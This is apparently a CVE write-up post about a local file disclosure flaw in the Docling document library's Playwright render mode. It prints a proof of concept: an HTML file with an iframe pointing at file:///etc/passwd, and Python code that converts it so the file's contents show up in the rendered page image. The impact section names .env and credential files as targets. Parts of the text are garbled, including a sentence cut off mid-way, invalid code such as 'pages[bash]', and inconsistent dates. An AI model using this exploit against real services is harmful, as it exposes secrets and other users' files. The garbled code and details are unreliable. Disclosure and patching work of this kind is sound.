Listen to this Post
Docling is a document processing library that parses diverse formats and provides integrations with generative AI ecosystems. The vulnerability exists in the HTML backend when the `render_page=True` option is enabled within HTMLBackendOptions. In this mode, Docling uses Playwright to render HTML pages in a headless browser. The `_get_browser_request_block_reason` method is responsible for filtering network requests, including `file:` URLs. In affected versions, this method allowed `file:` URLs unconditionally, before evaluating the `enable_local_fetch` option. Consequently, setting `enable_local_fetch=False` did not block local file access. Even when `enable_local_fetch=True` was set, file access was not restricted to the source document’s directory, unlike the non-render path which uses `ImageResourceLoader` and rejects absolute paths and path traversal. Versions 2.82.0 through 2.90.x performed no request filtering at all in render mode. From version 2.91.0 onward, JavaScript was disabled in the browser, making the disclosure passive: only content visibly rendered inside the page viewport appears in the generated page image. An attacker can craft an HTML file with an `
DailyCVE Form:
Platform: Docling
Version: 2.82.0-2.118.0
Vulnerability: Local file fetch
Severity: Medium
date: 2026-10-06
Prediction: 2026-08-07
What Undercode Say:
Check installed Docling version pip show docling | grep Version Install vulnerable version (for testing) pip install docling==2.118.0 Install Playwright dependency pip install playwright playwright install chromium
Python code to trigger the vulnerability
from docling.backend.html_backend import HTMLDocumentBackend
from docling.datamodel.base_models import InputFormat
from docling.datamodel.pipeline_options import HTMLBackendOptions
from docling.document_converter import DocumentConverter, FormatOption
Configure HTML backend with render_page enabled
html_backend_options = HTMLBackendOptions(render_page=True, enable_local_fetch=False)
Create converter
converter = DocumentConverter(
format_options={
InputFormat.HTML: FormatOption(
backend=HTMLDocumentBackend,
backend_options=html_backend_options,
)
}
)
Convert malicious HTML (Path input)
result = converter.convert("malicious.html")
The resulting DoclingDocument contains a page image with local file contents
Exploit: (Educational Purposes!)
<!-- malicious.html --> <!DOCTYPE html> <html> <body> <iframe src="file:///etc/passwd" width="1000" height="1000"></iframe> </body> </html>
exploit.py
from docling.document_converter import DocumentConverter
from docling.datamodel.pipeline_options import HTMLBackendOptions
options = HTMLBackendOptions(render_page=True, enable_local_fetch=False)
converter = DocumentConverter()
Assume the HTML backend is used for .html files
doc = converter.convert("malicious.html").document
doc.pages[bash].image contains the rendered file content
Extract text via OCR or visual inspection
Protection: from this CVE
- Upgrade Docling to version 2.118.1 or later.
- If upgrade is not possible, avoid using `render_page=True` when processing untrusted HTML.
- Pass HTML input as a stream instead of a filesystem
Path. - Ensure `enable_local_fetch` is set to `False` and verify that the backend respects it.
Impact:
An attacker who can submit HTML for conversion can read any text file the conversion process can read. This includes `.env` files, credential files, and other users’ documents on a shared host. The disclosure occurs passively through the page image attached to the returned DoclingDocument. Only applications that set `HTMLBackendOptions(render_page=True)` in Python, have the optional `playwright` dependency installed, and pass untrusted HTML as a filesystem `Path` are affected.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
projects@undercode.co.uk
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

